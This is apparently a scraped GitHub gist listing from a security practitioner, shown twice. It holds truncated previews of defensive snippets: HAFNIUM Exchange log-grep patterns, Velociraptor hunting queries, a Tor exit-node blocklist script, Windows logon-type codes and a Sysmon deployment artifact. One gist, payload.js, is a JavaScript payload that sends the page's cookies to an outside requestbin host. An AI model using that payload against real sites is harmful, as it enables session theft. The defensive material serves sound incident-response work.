Eric Capuano ecapuano

## keybase.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                ecapuano
                / keybase.md
            
            
              Created
              November 18, 2015 22:48
            
          
    Keybase proof

I hereby claim:

I am ecapuano on github.
I am ecapuano (https://keybase.io/ecapuano) on keybase.
I have a public key whose fingerprint is 2033 7875 F286 D318 5746  A2A7 27D2 E47B 52A3 720B

To claim this, I am signing this object:

  
## payload.js
javascript:var img = document.createElement('img');
img.src = "http://requestb.in/zngmupzn?cookie=" + document.cookie;

## random.sh
# character set to use for generating passwords
chars=abcdefghijklmnopqrstuvwxyz123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%

# how many passwords to generate
count=100

n=0
while [ $n -le $count ] ; do

        for i in {1..12} ; do  #### 12 defines the max size of the passwords

## getTORnodes.sh
#!/bin/bash

#
# Use 'crontab -e' to create a scheduled job for this. Every 6 hours or so should be good.
# Make sure your blocking software/hardware can access the tor_nodes.txt file via HTTP / FTP / SCP / etc...
#


curl https://check.torproject.org/exit-addresses | grep ExitAddress | cut -d' ' -f2 > /var/www/html/blocklists/tor_nodes.txt

## winlogontypes.csv

          
            id
            description

            
              2
              Interactive (logon at keyboard and screen of system)

            
              3
              Network (i.e. connection to shared folder on this computer from elsewhere on network)

            
              4
              Batch (i.e. scheduled task)

            
              5
              Service (Service startup)

            
              7
              Unlock (i.e. unlocking unnattended workstation)

            
              8
              NetworkCleartext (Logon with credentials sent in the clear text.)

            
              9
              NewCredentials such as with RunAs or mapping a network drive with alternate credentials.

            
              10
              RemoteInteractive (Terminal Services Remote Desktop or Remote Assistance)

            
              11
              CachedInteractive (logon with cached domain credentials)

## gist:13386852fb80beac4561f2bed569095e
# Quick tip to find super common artifacts of the HAFNIUM Exchange attacks with nothing more than IIS logs...
# Run this grep pattern against all logs in C:\inetpub\logs\LogFiles\W3SVC1
#
# https://twitter.com/eric_capuano

# Quick check for likely successful attacks
## Bash (faster)
egrep -i '((POST.*\/aspnet_client\/)|(system_web\/[A-Za-z0-9]{8}\.aspx|\/ecp\/y\.js)).*2[0-9]{2}\s[0-9]+' *.log
## PowerShell
Select-String -Pattern '((POST.*\/aspnet_client\/)|(system_web\/[A-Za-z0-9]{8}\.aspx|\/ecp\/y\.js)).*2[0-9]{2}\s[0-9]+' *.log

## wmi_event_consumer_stacking.txt
// run against results from Windows.Persistence.PermanentWMIEvents
// https://github.com/Velocidex/velociraptor/blob/master/artifacts/definitions/Windows/Persistence/PermanentWMIEvents.yaml

SELECT ConsumerDetails.Name AS ConsumerName, ConsumerDetails.CommandLineTemplate AS CommandLineTemplate, FilterDetails.Name AS FilterName, FilterDetails.Query AS FilterQuery, count() AS Count FROM source()
// filter common FPs
WHERE ConsumerName != "BVTConsumer"
AND ConsumerName != "SCM Event Log Consumer"
AND ConsumerName != "DellCommandPowerManagerAlertEventConsumer"
AND ConsumerName != "DellCommandPowerManagerPolicyChangeEventConsumer"
AND ConsumerName != "CmdLineConsumer_WSCEAA"

## gist:fc0cde0e9293bff8b01783cf8666d214
// Run against hunt results from Windows.System.Pslist
// Note: Returns ONLY unsigned processes, which minimizes less critical API calls
// Use's the server side enrichment artifact 'Artifact.Server.Enrichment.Virustotal' from @therealwlambert

LET VTKey <= "$apikey"
LET Results = SELECT Pid,Ppid,TokenIsElevated,Name,CommandLine,Exe,Hash.SHA256 AS SHA256, Authenticode, Username FROM source()
WHERE NOT Authenticode.Trusted = "trusted" // unsigned binaries
LIMIT 50

SELECT *, {SELECT * FROM Artifact.Server.Enrichment.Virustotal(VirustotalKey=VTKey, Hash=SHA256) } AS VTResults FROM foreach(row=Results)

## Custom.CapsSysmon.Deploy.xml
name: Custom.CapsSysmon.Deploy
description: |
   A quick and dirty way to download and install sysmon via Velociraptor
# Can be CLIENT, CLIENT_EVENT, SERVER, SERVER_EVENT
type: CLIENT
parameters:
   - name: sysmonURL
     default: http://url.to/sysmon8_64.exe
   - name: binPath
     default: C:\sysmon.exe

## Eradication.ps1
# A script that will safely remove adversary footholds on systems.
#
# Be sure to replace your observables down below. Be careful not to
# included LOLBINs as they cannot be safely killed this way. Use
# Kill-Threads.ps1 for those.
#
# Used with great success during CF20
#
# Author: Eric Capuano
	javascript:var img = document.createElement('img');
	img.src = "http://requestb.in/zngmupzn?cookie=" + document.cookie;
	# character set to use for generating passwords
	chars=abcdefghijklmnopqrstuvwxyz123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%

	# how many passwords to generate
	count=100

	n=0
	while [ $n -le $count ] ; do

	for i in {1..12} ; do #### 12 defines the max size of the passwords
	#!/bin/bash

	#
	# Use 'crontab -e' to create a scheduled job for this. Every 6 hours or so should be good.
	# Make sure your blocking software/hardware can access the tor_nodes.txt file via HTTP / FTP / SCP / etc...
	#


	curl https://check.torproject.org/exit-addresses \| grep ExitAddress \| cut -d' ' -f2 > /var/www/html/blocklists/tor_nodes.txt
	id	description
	2	Interactive (logon at keyboard and screen of system)
	3	Network (i.e. connection to shared folder on this computer from elsewhere on network)
	4	Batch (i.e. scheduled task)
	5	Service (Service startup)
	7	Unlock (i.e. unlocking unnattended workstation)
	8	NetworkCleartext (Logon with credentials sent in the clear text.)
	9	NewCredentials such as with RunAs or mapping a network drive with alternate credentials.
	10	RemoteInteractive (Terminal Services Remote Desktop or Remote Assistance)
	11	CachedInteractive (logon with cached domain credentials)
	# Quick tip to find super common artifacts of the HAFNIUM Exchange attacks with nothing more than IIS logs...
	# Run this grep pattern against all logs in C:\inetpub\logs\LogFiles\W3SVC1
	#
	# https://twitter.com/eric_capuano

	# Quick check for likely successful attacks
	## Bash (faster)
	egrep -i '((POST.\/aspnet_client\/)\|(system_web\/[A-Za-z0-9]{8}\.aspx\|\/ecp\/y\.js)).2[0-9]{2}\s[0-9]+' *.log
	## PowerShell
	Select-String -Pattern '((POST.\/aspnet_client\/)\|(system_web\/[A-Za-z0-9]{8}\.aspx\|\/ecp\/y\.js)).2[0-9]{2}\s[0-9]+' *.log
	// run against results from Windows.Persistence.PermanentWMIEvents
	// https://github.com/Velocidex/velociraptor/blob/master/artifacts/definitions/Windows/Persistence/PermanentWMIEvents.yaml

	SELECT ConsumerDetails.Name AS ConsumerName, ConsumerDetails.CommandLineTemplate AS CommandLineTemplate, FilterDetails.Name AS FilterName, FilterDetails.Query AS FilterQuery, count() AS Count FROM source()
	// filter common FPs
	WHERE ConsumerName != "BVTConsumer"
	AND ConsumerName != "SCM Event Log Consumer"
	AND ConsumerName != "DellCommandPowerManagerAlertEventConsumer"
	AND ConsumerName != "DellCommandPowerManagerPolicyChangeEventConsumer"
	AND ConsumerName != "CmdLineConsumer_WSCEAA"
	// Run against hunt results from Windows.System.Pslist
	// Note: Returns ONLY unsigned processes, which minimizes less critical API calls
	// Use's the server side enrichment artifact 'Artifact.Server.Enrichment.Virustotal' from @therealwlambert

	LET VTKey <= "$apikey"
	LET Results = SELECT Pid,Ppid,TokenIsElevated,Name,CommandLine,Exe,Hash.SHA256 AS SHA256, Authenticode, Username FROM source()
	WHERE NOT Authenticode.Trusted = "trusted" // unsigned binaries
	LIMIT 50

	SELECT , {SELECT FROM Artifact.Server.Enrichment.Virustotal(VirustotalKey=VTKey, Hash=SHA256) } AS VTResults FROM foreach(row=Results)
	name: Custom.CapsSysmon.Deploy
	description: \|
	A quick and dirty way to download and install sysmon via Velociraptor
	# Can be CLIENT, CLIENT_EVENT, SERVER, SERVER_EVENT
	type: CLIENT
	parameters:
	- name: sysmonURL
	default: http://url.to/sysmon8_64.exe
	- name: binPath
	default: C:\sysmon.exe
	# A script that will safely remove adversary footholds on systems.
	#
	# Be sure to replace your observables down below. Be careful not to
	# included LOLBINs as they cannot be safely killed this way. Use
	# Kill-Threads.ps1 for those.
	#
	# Used with great success during CF20
	#
	# Author: Eric Capuano